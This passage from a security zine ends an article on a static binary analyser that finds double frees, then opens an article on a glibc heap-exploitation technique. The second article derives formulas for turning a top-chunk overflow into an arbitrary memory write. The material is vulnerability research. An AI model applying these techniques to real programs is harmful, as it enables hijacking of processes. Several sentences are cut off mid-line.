   RAW       | Architecture  |    |   Gate    |    |   Alias   |    |   Heap   |
       ----> |               | -> |           | -> |           | -> |          | -> Results
   ASM       |   Backend     |    |  Visitor  |    |  Visitor  |    |  Visitor |
             |               |    |           |    |           |    |          |
              ---------------      -----------      -----------      ----------

--------------------[ C. Vulnerability checking

   Chevarista is used as follow in this demo framework. A certain big testsuits of binary
   files is provided in the package and the analysis is performed. In only a couple of
   seconds, all the analysis is finished:

   # We execute chevarista on testsuite binary 34

   $ autonomous/chevarista ../testsuite/34.elf
                  .:/\  Chevarista standalone version /\:.  

   => chevarista 
Detected SPARC
Chevarista IS STARTING
Calling sparc64_IDG
Created IDG
SPARC IDG : New bloc at addr 0000000000100A34 
SPARC IDG : New bloc at addr 00000000002010A0 
[!] Reached Invoke at addr 00000000002010A4 
SPARC IDG : New bloc at addr 0000000000100A44 
Cflow reference to : 00100A50 
Cflow reference from : 00100A48 
Cflow reference from : 00100C20 
SPARC IDG : New bloc at addr 0000000000100A4C 
SPARC IDG : New bloc at addr 0000000000100A58 
SPARC IDG : New bloc at addr 0000000000201080 
[!] Reached Invoke at addr 0000000000201084 
SPARC IDG : New bloc at addr 0000000000100A80 
SPARC IDG : New bloc at addr 0000000000100AA4 
SPARC IDG : New bloc at addr 0000000000100AD0 
SPARC IDG : New bloc at addr 0000000000100AF4 
SPARC IDG : New bloc at addr 0000000000100B10 
SPARC IDG : New bloc at addr 0000000000100B70 
SPARC IDG : New bloc at addr 0000000000100954 
Cflow reference to : 00100970 
Cflow reference from : 00100968 
Cflow reference from : 00100A1C 
SPARC IDG : New bloc at addr 000000000010096C 
SPARC IDG : New bloc at addr 0000000000100A24 
Cflow reference to : 00100A2C 
Cflow reference from : 00100A24 
Cflow reference from : 00100A08 
SPARC IDG : New bloc at addr 0000000000100A28 
SPARC IDG : New bloc at addr 0000000000100980 
SPARC IDG : New bloc at addr 0000000000100A10 
SPARC IDG : New bloc at addr 00000000001009C4 
SPARC IDG : New bloc at addr 0000000000100B88 
SPARC IDG : New bloc at addr 0000000000100BA8 
SPARC IDG : New bloc at addr 0000000000100BC0 
SPARC IDG : New bloc at addr 0000000000100BE0 
SPARC IDG : New bloc at addr 0000000000100BF8 
SPARC IDG : New bloc at addr 0000000000100C14 
SPARC IDG : New bloc at addr 00000000002010C0 
[!] Reached Invoke at addr 00000000002010C4 
SPARC IDG : New bloc at addr 0000000000100C20 
SPARC IDG : New bloc at addr 0000000000100C04 
SPARC IDG : New bloc at addr 0000000000100910 
SPARC IDG : New bloc at addr 0000000000201100 
[!] Reached Invoke at addr 0000000000201104 
SPARC IDG : New bloc at addr 0000000000100928 
SPARC IDG : New bloc at addr 000000000010093C 
SPARC IDG : New bloc at addr 0000000000100BCC 
SPARC IDG : New bloc at addr 00000000001008E0 
SPARC IDG : New bloc at addr 00000000001008F4 
SPARC IDG : New bloc at addr 0000000000100900 
SPARC IDG : New bloc at addr 0000000000100BD8 
SPARC IDG : New bloc at addr 0000000000100B94 
SPARC IDG : New bloc at addr 00000000001008BC 
SPARC IDG : New bloc at addr 00000000001008D0 
SPARC IDG : New bloc at addr 0000000000100BA0 
SPARC IDG : New bloc at addr 0000000000100B34 
SPARC IDG : New bloc at addr 0000000000100B58 
Cflow reference to : 00100B74 
Cflow reference from : 00100B6C 
Cflow reference from : 00100B2C 
Cflow reference from : 00100B50 
SPARC IDG : New bloc at addr 0000000000100B04 
SPARC IDG : New bloc at addr 00000000002010E0 
SPARC IDG : New bloc at addr 0000000000100AE8 
SPARC IDG : New bloc at addr 0000000000100A98 
Intraprocedural Dependance Graph has been built succesfully! 
A number of 47 blocs has been statically traced for flow-types
[+] IDG built

Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
Scalar parameter REPLACED with name = %o0 (addr= 00000000002010A4)
Backward dataflow analysis VAR        %o0, instr addr 00000000002010A4 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100A48 
Return-Value REPLACED with name = %i0 (addr= 0000000000100A44) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100A44 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100A5C 
Return-Value REPLACED with name = %i0 (addr= 0000000000100A58) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100A58 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100A6C 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o0, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o0, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o1 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o1, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o1 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o1, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o2 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o2, instr addr 0000000000201084 
Scalar parameter REPLACED with name = %o2 (addr= 0000000000201084)
Backward dataflow analysis VAR        %o2, instr addr 0000000000201084 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100A84 
Return-Value REPLACED with name = %i0 (addr= 0000000000100A80) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100A80 
Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100AA4 
Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100ABC 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100AAC 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100AD4 
Return-Value REPLACED with name = %i0 (addr= 0000000000100AD0) 
Backward dataflow analysis VAR        %i0, instr addr 0000000000100AD0 
Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100AF4 
Backward dataflow analysis VAR [%fp + 7d3], instr addr 0000000000100B24 
Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100B18 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B70 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B38 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
Backward dataflow analysis VAR        %fp, instr addr 0000000000100964 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000100958)
Backward dataflow analysis VAR        %o0, instr addr 0000000000100958 
Scalar parameter REPLACED with name = %o0 (addr= 0000000000100958)
Backward dataflow analysis VAR        %fp, instr addr 0000000000100B6C 
Backward dataflow analysis VAR [%fp + 7df], instr addr 0000000000100B60 
Backward dataflow analysis VAR [%fp + 7e7], instr addr 0000000000100B58 
[+] GateVisitor finished

[+] AliasVisitor finished

+ Entered Node Splitting for Node id 24 
+ Entered Node Splitting for Node id 194 
+ Entered Node Splitting for Node id 722 
+ Entered Node Splitting for Node id 794 
+ Entered Node Splitting for Node id 1514 
+ Entered Node Splitting for Node id 1536 
+ Entered Node Splitting for Node id 1642 
[+] SymbolicVisitor finished

Entering DotVisitor
+ SESE visited
+ SESE visited
* SESE already visited
* SESE already visited
+ SESE visited
+ SESE visited
* SESE already visited
* SESE already visited
* SESE already visited
! Node pointed by (nil) is NOT a SESE
+ SESE visited
* SESE already visited
* SESE already visited
* SESE already visited
[+] Print*Visitors finished

Starting HeapVisitor
Double Free found
Double Free found
Double malloc
[+] Heap visitor finished

[+] Chevarista has finished

    The run was performed in less than 2 seconds and multiple vulnerabilities have
    been found in the binary file (2 double free and one memory leak as indicated
    by the latest output). Its pretty useless without more information, which brings
    us to the results.

-------------------------[ D. Vulnerable paths extraction

      Once the analysis has been performed, we can simply check what the vulnerable
      paths were:

      ~/IDA/sdk/plugins/chevarista/src $ ls tmp/
      cflow.png  chevarista.alias  chevarista.buchi  \  chevarista.gate  chevarista.heap  chevarista.lir     \
      chevarista.symbolic  dflow.png

      Each visitor (transformation) outputs the complete program in each intermediate
      form. The most interesting thing is the output of the heap visitor that give
      us exactly the vulnerable paths:

      ~/IDA/sdk/plugins/chevarista/src $ cat tmp/chevarista.heap 

      [%fp + 7e7]

      [%fp + 7df]


      *                                 *
      * Multiple free of same variables *
      *                                 *

      path to free : 1
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a44 (4) {S} 46: %g1 = outparam_%o0                    
      @0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1                 
      @0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7      
      @0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0       
      @0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     

      path to free : 2
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a44 (4) {S} 46: %g1 = outparam_%o0                    
      @0x100a48 (8) {S} 60: local_%fp$0x7e7 = %g1                 
      @0x100b58 (8) {S} 2090: %g1 = local_%fp$0x7e7               
      @0x100b5c (8) {S} 2104: local_%fp$0x7d7 = %g1               
      @0x100b68 (8) {S} 2146: %g1 = local_%fp$0x7d7               
      @0x100b6c (8) {S} 2160: local_%fp$0x7df = %g1               
      @0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     

      path to free : 3
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a58 (4) {S} 96: %g1 = outparam_%o0                    
      @0x100a5c (8) {S} 110: local_%fp$0x7df = %g1                
      @0x100c14 (8) {S} 1524: outparam_%o0 = local_%fp$0x7df      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     

      path to free : 4
      @0x2010a4 (0) {S} 32: inparam_%i0 = Alloc(inparam_%i0)      
      @0x100a58 (4) {S} 96: %g1 = outparam_%o0                    
      @0x100a5c (8) {S} 110: local_%fp$0x7df = %g1                
      @0x100b60 (8) {S} 2118: %g1 = local_%fp$0x7df               
      @0x100b64 (8) {S} 2132: local_%fp$0x7e7 = %g1               
      @0x100bcc (8) {S} 1770: outparam_%o0 = local_%fp$0x7e7      
      @0x1008e4 (8) {S} 1792: local_%fp$0x87f = inparam_%i0       
      @0x1008f4 (8) {S} 1828: outparam_%o0 = local_%fp$0x87f      
      @0x2010c4 (0) {S} 1544: inparam_%i0 = Free(inparam_%i0)     
      ~/IDA/sdk/plugins/chevarista/src $ 

As you can see, we now have the complete vulnerable paths where multiple
frees are done in sequence over the same variables. In this example, 2
double frees were found and one memory leak, for which the path to free
is not given, since there is no (its a memory leak :).

A very useful trick was also to give more refined types to operands. For
instance, local variables can be identified pretty easily if they are
accessed throught the stack pointer. Function parameters and results
can also be found easily by inspecting the use of %i and %o registers
(for the SPARC architecture only).

----------------[ E. Future work : Refinement

	The final step of the analysis is refinement [CEGF]. Once you have analyzed
   a program for vulnerabilities and we have extracted the path of the program
   that looks like leading to a corruption, we need to recreate the real conditions
   of triggering the bug in the reality, and not in an abstract description of the
   program, as we did in that article. For this, we need to execute for real (this
   time) the program, and try to feed it with data that are deduced from the 
   conditional predicates that are on the abstract path of the program that leads to
   the potential vulnerability. The input values that we would give to the program
   must pass all the tests that are on the way of reaching the bug in the real world.

   Not a lot of projects use this technique. It is quite recent research to determine
   exactly how to be the most precise and still scaling to very big programs. The
   answer is that the precision can be requested on demand, using an iterative procedure
   as done in the BLAST [BMC] model checker. Even advanced abstract interpretation
   framework [ASA] do not have refinement in their framework yet : some would argue
   its too computationally expensive to refine abstractions and its better to couple
   weaker abstractions together than tring to refine a single "perfect" one.


---------------[ V. Related Work

	Almost no project about this topic has been initiated by the underground. The
	work of Nergal on finding integer overflow into Win32 binaries is the first
	notable attempt to mix research knowledge and reverse engineering knowledge,
	using a decompiler and a model checker. The work from Halvar Flake in the framework 
	of BinDiff/BinNavi [BN] is interesting but serves until now a different purpose than 
	finding vulnerabilities in binary code.

	On a more theoretical point of view, the interested reader is invited to look
	at the reference for findings a lot of major readings in the field of program
	analysis. Automated reverse engineering, or decompiling, has been studied in
	the last 10 years only and the gap is still not completely filled between those
	2 worlds. This article tried to go into that direction by introducing formal
	techniques using a completely informal view.

	Mostly 2 different theories can be studied : Model Checking [MC] and Abstract 
	Interpretation [AI] . Model Checking generally involves temporal logic properties
	expressed in languages such as LTL, CTL, or CTL* or [TL]. Those properties are then
	translated to automata. Traces are then used as words and having the automata
	not recognizing a given trace will mean breaking a property. In practice, the
	formula is negated, so that the resulting automata will only recognize the trace
	leading to vulnerabilities, which sounds a more natural approach for detecting

	Abstract interpretation [ASA] is about finding the most adequate system representation 
	for allowing the checking to be computable in a reasonable time (else we might 
	end up doing an "exhaustive bruteforce checking" if we try to check all the potential
 	behavior of the program, which can btw be infinite). By reasoning into an abstract
	domain, we make the state-space to be finite (or at least reduced, compared to the 
	real state space) which turn our analysis to be tractable. The strongest the
	abstractions are, the fastest and imprecise our analysis will be. All the job
	consist in finding the best (when possible) or an approximative abstraction that
	is precise enough and strong enough to give results in seconds or minuts.

	In this article, we have presented some abstractions without quoting them explicitely
	(interval abstraction, trace abstraction, predicate abstraction ..). You can also
	design product domains, where multiple abstractions are considered at the same time,
	which gives the best results, but for which automated procedures requires more work
	to be defined.

------[ VI. Conclusion

	I Hope to have encouraged the underground community to think about using more
	formal techniques for the discovery of bugs in programs. I do not include this
	dream automated tool, but a simplier one that shows this approach as rewarding,
	and I look forward seing more automated tools from the reverse engineering 
	community in the future. The chevarista analyzer will not be continued as it, 
	but is being reimplemented into a different analysis environment, on top of a
	dedicated language for reverse engineering and decompilation of machine code.
	Feel free to hack inside the code, you dont have to send me patches as I do not
	use this tool anymore for my own vulnerability auditing. I do not wish to encourage
	script kiddies into using such tools, as they will not know how to exploit the
	results anyway (no, this does not give you a root shell).

------[ VII. Greetings

	Why should every single Phrack article have greetings ? 

	The persons who enjoyed Chevarista know who they are.

------[ VIII. References

 [TVLA] Three-Valued Logic
 [AI] Abstract Interpretation

 [MC] Model Checking

 [CEGF] Counterexample-guided abstraction refinement 
        E Clarke - Temporal Representation and Reasoning

 [BN] Sabre-security BinDiff & BinNavi

 [JPF] NASA JavaPathFinder

 [UNG] UQBT-ng : a tool that finds integer overflow in Win32 binaries

 [SSA] Efficiently computing static single assignment form
       R Cytron, J Ferrante, BK Rosen, MN Wegman
       ACM Transactions on Programming Languages and SystemsFK 
 [SSI] Static Single Information (SSI)
       CS Ananian - 1999 -       

 [MCI] Modern Compiler Implementation (Book)
       Andrew Appel
 [BMC] The BLAST Model Checker

 [AD] 22C3 - Autodafe : an act of software torture

 [TL] Linear Temporal logic

 [ASA] The ASTREE static analyzer

 [DLB] Dvorak LKML select bug
       Somewhere lost on

 [RSI] ERESI (Reverse Engineering Software Interface)

 [PA] Automatic Predicate Abstraction of C Programs
      T Ball, R Majumdar, T Millstein, SK Rajamani 
      ACM SIGPLAN Notices 2001

 [IRM] INTEL reference manual

 [SRM] SPARC reference manual

 [LAT] Wikipedia : lattice
 [DDA] Data Dependence Analysis of Assembly Code

 [DP] Design Patterns : Elements of Reusable Object-Oriented Software
      Erich Gamma, Richard Helm, Ralph Johnson & John Vlissides

------[ IX. The code    

Feel free to contact me for getting the code. It is not included
in that article but I will provide it on request if you show
an interest. 


            _                                                    _
          _/B\_                                                _/W\_
          (* *)                Phrack #64 file 9               (* *)
          | - |                                                | - |
          |   |  The use of set_head to defeat the wilderness  |   |
          |   |                                                |   |
          |   |                    By g463                     |   |
          |   |                                                |   |
          |   |        |   |

1 - Introduction

2 - The set_head() technique
  2.1 - A look at the past - "The House of Force" technique
  2.2 - The basics of set_head()
  2.3 - The details of set_head()

3 - Automation
  3.1 - Define the basic properties
  3.2 - Extract the formulas
  3.3 - Compute the values

4 - Limitations
  4.1 - Requirements of two different techniques
      4.1.1 - The set_head() technique
      4.1.2 - The "House of Force" technique
  4.2 - Almost 4 bytes to almost anywhere technique
      4.2.1 - Everything in life is a multiple of 8
      4.2.2 - Top chunk's size needs to be bigger than the requested malloc
      4.2.3 - Logical OR with PREV_INUSE

5 - Taking set_head() to the next level
  5.1 - Multiple overwrites
  5.2 - Infoleak

6 - Examples
  6.1 - The basic scenarios - The most basic form of the set_head() technique - Exploit - Multiple overwrites - Exploit
  6.2 - A real case scenario: file(1) utility
      6.2.1 - The hole
      6.2.2 - All the pieces fall into place
      6.2.3 - hanuman.c

7 - Final words

8 - References

--[ 1 - Introduction

Many papers have been published in the past describing techniques on how to
take advantage of the inbound memory management in the GNU C Library
implementation.  A first technique was introduced by Solar Designer in his
security advisory on a flaw in the Netscape browser[1].  Since then, many
improvements have been made by many different individuals ([2], [3], [4],
[5], [6] just to name a few).  However, there is always one situation that
gives a lot more trouble than others.  Anyone who has already tried to take
advantage of that situation will agree. How to take control of a vulnerable
program when the only critical information that you can overwrite is the
header of the wilderness chunk?

The set_head technique is a new way to obtain a "write almost 4 arbitrary
bytes to almost anywhere" primitive. It was born because of a bug in the
file(1) utility that the author was unable to exploit with existing

This paper will present the details of the technique.  Also, it will show
you how to practically apply this technique to other exploits.  The
limitations of the technique will also be presented.  Finally, some
examples will be shown to better understand the various aspects of the

--[ 2 - The set_head() technique

Most of the time, people who write exploits using malloc techniques are not
aware of the difficulties that the wilderness chunk implies until they face
the problem.  It is only at this exact time that they realize how the known
techniques (i.e. unlink, etc.) have no effect on this particular context.

As MaXX once said [3]: "The wilderness chunk is one of the most dangerous
opponents of the attacker who tries to exploit heap mismanagement. Because
this chunk of memory is handled specially by the dlmalloc internal
routines, the attacker will rarely be able to execute arbitrary code if
they solely corrupt the boundary tag associated with the wilderness chunk."

----[ 2.1 - A look at the past - "The House of Force" technique

To better understand the details of the set_head() technique explained in
this paper, it would be helpful to first understand what has already been
done on the subject of exploiting the top chunk.

This is not the first time that the exploitation of the wilderness chunk
has been specifically targeted.  The pioneer of this type of exploitation
is Phantasmal Phantasmagoria.

He first wrote an article entitled "Exploiting the wilderness" about it in
2004.  Details of this technique are out of scope for the current paper,
but you can learn more about it by reading his paper [5].

He gave a second try at exploiting the wilderness in his excellent paper
"Malloc Maleficarum" [4].  He named his technique "The House of Force".  To
better understand the set_head() technique, the "House of Force" is
described below.

The idea behind "The House of Force" is quite simple but there are specific
steps that need to be followed.  Below, you will find a brief summary of
all the steps.

Step one:

The first step in the "House of Force" consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is.  The preferred new size of the top chunk should be
0xffffffff.  Below is a an ascii graphic of the memory layout at the time
of the overflow.  Notice that the location of the top chunk is somewhere in
the heap.

                0xbfffffff  -> +-----------------+
                               |                 |
                               |     stack       |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |<--- Top chunk
                               |                 |
                               |  global offset  |
                               |      table      |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

Step two:

After this, a call to malloc with a user-supplied size should be issued.
With this call, the top chunk will be split in two parts.  One part will be
returned to the user, and the other part will be the remainder chunk (the
top chunk).

The purpose of this step is to move the top chunk right before a global
offset table entry.  The new location of the top chunk is the sum of the
current address of the top chunk and the value of the malloc call.  This
sum is done with the following line of code:

        --[ From malloc.c

        remainder = chunk_at_offset(victim, nb);

After the malloc call, the memory layout should be similar to the
representation below:

                0xbfffffff  -> +-----------------+
                               |                 |
                               |     stack       |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |
                               |                 |
                               |  global offset  |
                               |      table      |
                               +-----------------+<--- Top chunk
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

Step three:

Finally, another call to malloc needs to be done.  This one needs to be
large enough to trigger the top chunk code.  If the user has some sort of
control over the content of this buffer, he can then overwrite entries
inside the global offset table and he can seize control of the process.
Look at the following representation for the current memory layout at the
time of the allocation:

                0xbfffffff  -> +-----------------+
                               |                 |
                               |     stack       |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |<---- Top chunk
                               |                 |---+
                               +-----------------+   |
                               |  global offset  |   |- Allocated memory
                               |      table      |   |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

----[ 2.2 - The basics of set_head()

Now that the basic review of the "House of Force" technique is done, let's
look at the set_head() technique.  The basic idea behind this technique is
to use the set_head() macro to write almost four arbitrary bytes to almost
anywhere in memory.  This macro is normally used to set the value of the
size field of a memory chunk to a specific value.  Let's have a peak at the

        --[ From malloc.c:

        /* Set size/use field */
        #define set_head(p, s)       ((p)->size = (s))

This line is very simple to understand.  It takes the memory chunk 'p',
modifies its size field and replace it with the value of the variable 's'.
If the attacker has control of those two parameters, it may be possible to
modify the content of an arbitrary memory location with a value that he

To trigger the particular call to set_head() that could lead to this
arbitrary overwrite, two specific steps need to be followed.  These steps
are described below.

First step:

The first step of the set_head() technique consists in overflowing the size
field of the top chunk to make the malloc library think it is bigger than
it actually is.  The specific value that you will overwrite with will
depend on the parameters of the exploitable situation.  Below is an ascii
graphic of the memory layout at the time of the overflow.  Notice that the
location of the top chunk is somewhere in the heap.

                0xbfffffff  -> +-----------------+
                               |                 |
                               |      stack      |
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |<--- Top chunk
                               |                 |
                               |                 |
                               |      data       |
                               |                 |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

Second step:

After this, a call to malloc with a user-supplied size should be issued.
With this call, the top chunk will be split in two parts.  One part will be
returned to the user, and the other part will be the remainder chunk (the
top chunk).

The purpose of this step is to move the top chunk before the location that
you want to overwrite.  This location needs to be on the stack, and you
will see why at section 4.2.2.  During this step, the malloc code will set
the size of the new top chunk with the set_head() macro.  Look at the
representation below to better understand the memory layout at the time of
the overwrite:

                0xbfffffff  -> +-----------------+
                               |                 |
                               |      stack      |
                               |                 |
                               | size of topchunk|
                               |prev_size not use|
                               +-----------------+<--- Top chunk
                               |                 |
                               :                 :
                               :                 :
                               .                 .
                               :                 :
                               :                 :
                               |                 |
                               |                 |
                               |      heap       |
                               |                 |
                               |                 |
                               |      data       |
                               |                 |
                               |                 |
                               |                 |
                               |      text       |
                               |                 |
                               |                 |
                0x08048000  -> +-----------------+

If you control the new location of the top chunk and the new size of the
top chunk, you can get a "write almost 4 arbitrary bytes to almost
anywhere" primitive.

----[ 2.3 - The details of set_head()

The set_head macro is used many times in the malloc library.  However, it's
used at a particularly interesting emplacement where it's possible to
influence its parameters.  This influence will let the attacker overwrite 4
bytes in memory with a value that he can control.

When there is a call to malloc, different methods are tried to allocate the
requested memory.  MaXX did a pretty great job at explaining the malloc
algorithm in section 3.5.1 of his text[3].  Reading his text is highly
suggested before continuing with this text.  Here are the main points of
the algorithm:

        1. Try to find a chunk in the bin corresponding to the size of the

        2. Try to use the remainder chunk;

        3. Try to find a chunk in the regular bins.

If those three steps fail, interesting things happen.  The malloc function
tries to split the top chunk.  The 'use_top' code portion is then called.
It's in that portion of code that it's possible to take advantage of a call
to set_head().  Let's analyze the use_top code:

--[ From malloc.c

01 Void_t*
02 _int_malloc(mstate av, size_t bytes)
03 {
04   INTERNAL_SIZE_T nb;               /* normalized request size */
06   mchunkptr       victim;           /* inspected/selected chunk */
07   INTERNAL_SIZE_T size;             /* its size */
09   mchunkptr       remainder;        /* remainder from a split */
10   unsigned long   remainder_size;   /* its size */
13   checked_request2size(bytes, nb);
15 [ ... ]
17     use_top:
19     victim = av->top;
20     size = chunksize(victim);
22     if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
23       remainder_size = size - nb;
24       remainder = chunk_at_offset(victim, nb);
25       av->top = remainder;
26       set_head(victim, nb | PREV_INUSE |
27                (av != &main_arena ? NON_MAIN_ARENA : 0));
28       set_head(remainder, remainder_size | PREV_INUSE);
30       check_malloced_chunk(av, victim, nb);
31       return chunk2mem(victim);
32     }

All the magic happens at line 28.  By forcing a particular context inside
the application, it's possible to control set_head's parameters and then
overwrite almost any memory addresses with almost four arbitrary bytes.

Let's see how it's possible to control these two parameters, which are
'remainder' and 'remainder_size' :

        1. How to get control of 'remainder_size':

           a. At line 13, 'nb' is filled with the normalized size of the
              value of the malloc call.  The attacker should have control
              on the value of this malloc call.

           b. Remember that this technique requires that the size field of
              the top chunk needs to be overwritten by the overflow.  At
              line 19 & 20, the value of the overwritten size field of the
              top chunk is getting loaded in 'size'.

           c. At line 22, a check is done to ensure that the top chunk is
              large enough to take care of the malloc request.  The
              attacker needs that this condition evaluates to true to reach
              the set_head() macro at line 28.

           d. At line 23, the requested size of the malloc call is
              subtracted from the size of the top chunk.  The remaining
              value is then stored in 'remainder_size'.

        2. How to get control of 'remainder':

           a. At line 13, 'nb' is filled with the normalized size of the
              value of the malloc call.  The attacker should have control
              of the value of this malloc call.

           b. Then, at line 19, the variable 'victim' gets filled with the
              address of the top chunk.

           c. After this, at line 24, chunk_at_offset() is called.  This
              macro adds the content of 'nb' to the value of 'victim'.  The
              result will be stored in 'remainder'.

Finally, at line 28, the set_head() macro modifies the size field of the
fake remainder chunk and fills it with the content of the variable
'remainder_size'.  This is how you get your "write almost 4 arbitrary bytes
to almost anywhere in memory" primitive.

--[ 3 - Automation

It was explained in section 2.3 that the variables 'remainder' and
'remainder_size' will be used as parameters to the set_head macro.  The
following steps will explain how to proceed in order to get the desired
value in those two variables.

----[ 3.1 - Define the basic properties

Before trying to exploit a security hole with the set_head technique, the
attacker needs to define the parameters of the vulnerable context.  These
parameters are:

        1. The return location:  This is the location in memory that you
           want to write to.  It is often referred as 'retloc' through this

        2. The return address: This is the content that you will write to
           your return location.  Normally, this will be a memory address
           that points to your shellcode.  It is often referred as 'retadr'
           through this paper.

        3. The location of the topchunk: To use this technique, you must
           know the exact position of the top chunk in memory.  This
           location is often referred as 'toploc' through this paper.

----[ 3.2 - Extract the formulas

The attacker has control on two things during the exploitation stage.
First, the content of the overwritten top chunk's size field and secondly,
the size parameter to the malloc call.  The values that the attacker
chooses for these will determine the exact content of the variables
'remainder' and 'remainder_size' later used by the set_head() macro.

Below, two formulas are presented to help the attacker find the appropriate

        1. How to get the value for the malloc parameter:

           a. The following line is taken directly from the malloc.c code:

              remainder = chunk_at_offset(victim, nb)

           b. 'nb' is the normalized value of the malloc call.  It's the
              result of the macro request2size().  To make things simpler,
              let's add 8 to this value to take care of this macro:

              remainder = chunk_at_offset(victim, nb + 8)

           c. chunk_at_offset() adds the normalized size 'nb' to the top
              chunk's location:

              remainder = toploc + (nb + 8)

           e. 'remainder' is the return location (i.e. 'retloc') and 'nb'
              is the malloc size (i.e. 'malloc_size'):

              retloc = toploc + (malloc_size + 8)

           d. Isolate the 'malloc_size' variable to get the final formula:

              malloc_size = (retloc - toploc - 8)

        2. The second formula is how to get the new size of the top chunk.

           a. The following line is taken directly from the malloc.c code:

              remainder_size = size - nb;

           b. 'size' is the size of the top chunk (i.e. 'topchunk_size'),
              and 'nb' is the normalized parameter of the malloc call
              (i.e. 'malloc_size'):

              remainder_size = topchunk_size - malloc_size

           c. 'remainder_size' is in fact the return address
              (i.e. retadr'):

              retadr = topchunk_size - malloc_size

           d. Isolate 'topchunk_size' to get the final formula:

              topchunk_size = retadr + malloc_size

           e. topchunk_size will get its three least significant bits
              cleared by the macro chunksize().  Let's consider this in the
              formula by adding 8 to the right side of the equation:

              topchunk_size = (retadr + malloc_size + 8)

           g. Take into consideration that the PREV_INUSE flag is being set
              in the set_head() macro:

              topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE

----[ 3.3 - Compute the values

You now have the two basic formulas:

        1. malloc_size = (retloc - toploc - 8)

        2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE

You can now proceed with finding the exact values that you will plug into
your exploit.

To facilitate the integration of those formulas in your exploit code, you
can use the set_head_compute() function found in the file(1) utility
exploit code (refer to section 6.2.3).  Here is the prototype of the

        struct sethead * set_head_compute
            (unsigned int retloc, unsigned int retadr, unsigned int toploc)

The structure returned by the function set_head_compute() is defined this

        struct sethead {
            unsigned long topchunk_size;
            unsigned long malloc_size;

By giving this function your return location, your return address and your
top chunk location, it will compute the exact malloc size and top chunk
size to use in your exploit.  It will also tell you if it's possible to
execute the requested write operation based on the return address and the
return location you have chosen.

--[ 4 - Limitations

At the time of writing this paper, there was no simple and easy way to
exploit a heap overflow when the top chunk is involved.  Each exploitation
technique needs a particular context to work successfully.  The set_head
technique is no different.  It has some requirements to work properly.

Also, it's not a real "write 4 arbitrary bytes to anywhere" primitive.  In
fact, it would be more of a "write almost 4 arbitrary bytes to almost
anywhere in memory" primitive.

----[ 4.1 - Requirements of two different techniques

Specific elements need to be present to exploit a situation in which the
wilderness chunk is involved.  These elements tend to impose a lot of
constraints when trying to exploit a program.  Below, the requirements for
the set_head technique are listed, alongside those of the "House of Force"
technique. As you will see, each technique has its pros and cons.

------[ 4.1.1 - The set_head() technique

Minimum requirements:

        1. The size field of the topchunk needs to be overwritten with a
           value that the attacker can control;

        2. Then, there is a call to malloc with a parameter that the
           attacker can control;

This technique will let you write almost 4 arbitrary bytes to almost

